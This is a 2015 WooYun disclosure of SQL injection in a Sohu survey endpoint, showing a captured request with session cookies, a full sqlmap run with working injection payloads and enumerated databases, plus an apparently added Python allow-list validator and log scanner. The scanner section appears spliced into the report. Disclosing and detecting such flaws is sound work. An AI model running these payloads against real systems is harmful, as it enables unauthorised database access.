WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2015-05-24: Details reported to the vendor, awaiting vendor response
2015-05-25: Vendor has confirmed; details disclosed to the vendor only
2015-06-04: Details disclosed to core white hats and domain experts
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to intern white hats
2015-07-09: Details disclosed to the public

Round three!

Begging-for-a-plush-toy vulnerability, round three (part 3): SQL injection on a Sohu site. At the sign-up form, fill in the fields and capture the request:
GET /Survey/submit?callback=jQuery203035808908636681736_1432457382472&sid=815&opts%5B2864%5D=asdasd&opts%5B2865%5D=asdasd&opts%5B2866%5D=asdasda&opts%5B2867%5D=13311111111&opts%5B2868%5D%5B%5D=8607&_=1432457382473 HTTP/1.1
Host: appsurvey.focus.cn
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://chanye.focus.cn/news/2015-04-30/6221522.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: webimid2="Bih7ngb1O/Z2FBHSojt3FTJEK8Z4JtBLcJSvtBN5nK/N6Tl1Ctri69dXZyhIZ/62FXa+kHlRCCU="; bjforumsaw67851912=2707; IPLOC=CN5100; SUV=1504021051181769; esf_recommend_unit_search=d7fddb5a18f2caf2b7684f6ee7dcea37YToyOntzOjc6ImNpdHlfaWQiO2k6MTtzOjEwOiJzZWFyY2hfY29uIjthOjE6e2k6MjthOjE6e3M6OToiaG91c2VUeXBlIjthOjE6e3M6MjoiaW4iO2E6Mzp7aTowO2k6MjI7aToxO2k6MjA7aToyO2k6MjE7fX19fX0%3D; bjforumsaw=526%2C2707; lzstat_uv=10630109082488956093|3428069; PHPSESSID=v7vg9811gk5s1rt9g4ofequlq1; _ga=GA1.2.1530492624.1427944125; lastdomain=1432647781|ZGVhbGVyLWJhdDY5MjEwQHNvaHUuY29tfENDODdGMkM5NUEzQkM2M0Y5RkMzQUIwOUVDNUE5NjYyQHFxLnNvaHUuY29tfA|sohu.com; __utmt=1; sohutag=8HsmeSc5NCwmcyc5NCwmYjc5NCwmYSc5NCwmZjc5MiUsJ2cmOiAsJ24mOiAsJ2kmOiAsJ3cmOiAsJ2gmOiAsJ2NmOiAsJ2UmOiAsJ20mOiB9; __utma=1.1530492624.1427944125.1431101698.1432457112.6; __utmb=1.13.10.1432457112; __utmc=1; __utmz=1.1432457112.6.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=site%3Achanye.focus.cn%20inurl%3A%3D%3D
[root@Hacker~]# Sqlmap Sqlmap -r E:\4.txt --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o

[*] starting at 16:51:06

[16:51:06] [INFO] parsing HTTP request from 'E:\4.txt'
[16:51:07] [INFO] testing connection to the target URL
[16:51:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[16:51:08] [INFO] target URL is stable
[16:51:08] [INFO] testing if GET parameter 'callback' is dynamic
[16:51:08] [INFO] confirming that GET parameter 'callback' is dynamic
[16:51:08] [INFO] GET parameter 'callback' is dynamic
[16:51:08] [WARNING] heuristic (basic) test shows that GET parameter 'callback' might not be injectable
[16:51:08] [INFO] testing for SQL injection on GET parameter 'callback'
[16:51:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:51:08] [WARNING] reflective value(s) found and filtering out
[16:51:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:51:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:51:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:51:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:51:13] [INFO] testing 'MySQL inline queries'
[16:51:13] [INFO] testing 'PostgreSQL inline queries'
[16:51:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:51:13] [INFO] testing 'Oracle inline queries'
[16:51:13] [INFO] testing 'SQLite inline queries'
[16:51:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:51:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:51:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:51:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:51:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:51:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:51:18] [INFO] testing 'Oracle AND time-based blind'
[16:51:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:51:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:51:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it usi
[16:51:35] [WARNING] GET parameter 'callback' is not injectable
[16:51:35] [INFO] testing if GET parameter 'sid' is dynamic
[16:51:35] [INFO] confirming that GET parameter 'sid' is dynamic
[16:51:35] [INFO] GET parameter 'sid' is dynamic
[16:51:35] [INFO] heuristic (basic) test shows that GET parameter 'sid' might be injectable (possible DBMS: 'MySQL')
[16:51:35] [INFO] testing for SQL injection on GET parameter 'sid'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[16:51:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:51:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:51:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:51:43] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[16:51:44] [INFO] GET parameter 'sid' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[16:51:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:51:44] [INFO] GET parameter 'sid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:51:44] [INFO] testing 'MySQL inline queries'
[16:51:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:51:55] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 stacked queries' injectable
[16:51:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:52:05] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:52:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:52:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) techniq
[16:52:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[16:52:12] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[16:52:15] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[16:52:17] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[16:52:20] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[16:52:23] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[16:52:26] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[16:52:28] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[16:52:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[16:52:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 446 HTTP(s) requests:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 RLIKE IF(5132=5132,815,0x28)&opts[2864]=asdasd&opts[2865]=asdasd&opts

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND (SELECT 4934 FROM(SELECT COUNT(*),CONCAT(0x7165636671,(SELECT (CA

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815; SELECT SLEEP(5)-- &opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=as

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND SLEEP(5)&opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=asdasda&o
---
[16:52:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[16:52:41] [INFO] fetching database names
[16:52:41] [INFO] the SQL query used returns 2 entries
[16:52:41] [INFO] retrieved: information_schema
[16:52:42] [INFO] retrieved: survey
available databases [2]:
[*] information_schema
[*] survey
[16:52:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 142 times
[16:52:42] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha
[16:52:42] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\appsurvey.focus.cn'
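The sqlmap run above confirms four techniques against `sid` (boolean-based RLIKE, error-based, stacked queries, time-based), a parameter that should only ever carry a numeric survey id, and the 142 HTTP 500 responses are the side effect of the error-based probing. The Python below is an added example, not code from the report or from the affected site: it applies the allow-list check `sid` should have received server-side (a short decimal integer, nothing else) and runs the same rule over combined-format access-log lines to label any non-integer value by the payload shape it resembles. The log lines, client IPs, timestamps and status codes are constructed; only the path `/Survey/submit`, the parameter name `sid` and the payload shapes come from the report.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in combined-log format (not from the report).
# The sid values mirror the four payload shapes sqlmap reported for this
# endpoint; client IPs, timestamps, status codes and sizes are made up.
SAMPLE_LOG = [
    '203.0.113.10 - - [24/May/2015:16:50:59 +0800] "GET /Survey/submit?callback=jQuery1_1&sid=815&opts%5B2864%5D=ok HTTP/1.1" 200 61',
    '198.51.100.7 - - [24/May/2015:16:51:02 +0800] "GET /index.html HTTP/1.1" 200 1234',
    '203.0.113.10 - - [24/May/2015:16:51:44 +0800] "GET /Survey/submit?callback=jQuery1_2&sid=815%20RLIKE%20IF(5132=5132,815,0x28)&opts%5B2864%5D=asdasd HTTP/1.1" 200 61',
    '203.0.113.10 - - [24/May/2015:16:51:44 +0800] "GET /Survey/submit?callback=jQuery1_3&sid=815%20AND%20(SELECT%204934%20FROM(SELECT%20COUNT(*),CONCAT(0x7165636671,0x71))x)&opts%5B2864%5D=asdasd HTTP/1.1" 500 1024',
    '203.0.113.10 - - [24/May/2015:16:51:55 +0800] "GET /Survey/submit?callback=jQuery1_4&sid=815%3B%20SELECT%20SLEEP(5)--%20&opts%5B2864%5D=asdasd HTTP/1.1" 200 61',
    '203.0.113.10 - - [24/May/2015:16:52:05 +0800] "GET /Survey/submit?callback=jQuery1_5&sid=815%20AND%20SLEEP(5)&opts%5B2864%5D=asdasd HTTP/1.1" 200 61',
]

# Apache/nginx combined log: ip ident user [time] "method target proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# The server-side rule sid should have enforced: a plain decimal survey id.
SID_PATTERN = re.compile(r'[0-9]{1,10}')

# Ordered signatures for the payload shapes in the sqlmap output above.
# Stacked queries are checked first because they usually also contain SLEEP().
SIGNATURES = [
    ('stacked-query', re.compile(r';\s*(select|insert|update|delete|drop)\b', re.I)),
    ('time-based', re.compile(r'\b(sleep|benchmark|pg_sleep)\s*\(', re.I)),
    ('error-based', re.compile(r'\bcount\(\*\).*\bconcat\(|\b(extractvalue|updatexml)\s*\(', re.I)),
    ('boolean-blind', re.compile(r'\b(rlike|and|or)\b\s*(if\s*\(|\d+\s*=\s*\d+|\(\s*select\b)', re.I)),
]


def parse_query(query):
    """Split a raw query string into {name: [values]}.

    Done by hand so that ';' inside a value is never treated as a separator
    (older urllib.parse.parse_qs versions split on it)."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def is_valid_sid(value):
    """Allow-list check: sid must be a short decimal integer, nothing else."""
    return SID_PATTERN.fullmatch(value) is not None


def classify_sid(value):
    """Name the injection technique a rejected sid resembles; None if sid is valid."""
    if is_valid_sid(value):
        return None
    for name, pattern in SIGNATURES:
        if pattern.search(value):
            return name
    return 'malformed-sid'


def scan_log(lines, path='/Survey/submit'):
    """Return one alert dict per request to `path` whose sid fails the integer rule."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        if parts.path != path:
            continue
        for sid in parse_query(parts.query).get('sid', []):
            technique = classify_sid(sid)
            if technique is not None:
                alerts.append({
                    'ip': m.group('ip'),
                    'time': m.group('time'),
                    'status': m.group('status'),
                    'sid': sid,
                    'technique': technique,
                })
    return alerts


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['time']} {alert['ip']} HTTP {alert['status']} "
              f"{alert['technique']}: {alert['sid']!r}")
```

The same `is_valid_sid` rule is the fix on the application side: reject anything that is not a decimal id before it reaches the query, and bind the value as an integer parameter rather than concatenating it. On the detection side the signature labels are a convenience for triage; the alert fires on the allow-list failure alone, so a payload shape not listed here is still caught as `malformed-sid`, and a burst of HTTP 500s on the same path (as the run above produced) is a second signal worth correlating.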
Sohu folks, could I get a plush toy? This is the third hole already~ Some encouragement please, I love your plush toys, thx :)

Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-05-25 00:07

Thanks for your support. Please send us your address so we can mail you the fox.

None yet